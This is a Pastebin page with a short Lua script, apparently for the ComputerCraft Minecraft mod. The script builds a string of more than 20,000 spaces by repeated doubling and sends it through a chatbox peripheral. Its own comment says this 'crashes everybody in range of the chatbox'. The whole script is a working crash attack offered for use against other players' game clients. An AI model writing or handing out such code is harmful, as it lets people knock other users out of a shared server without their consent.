Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local crashstring = " "
- -- making the crash string long instead of pasting 40k characters in manually
- while #crashstring < 20000 do
- crashstring = crashstring..crashstring
- end
- --Define the chatbox on the right side
- local p = peripheral.wrap("right")
- --Crashes everybody in range of the chatbox
- p.say(crashstring)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement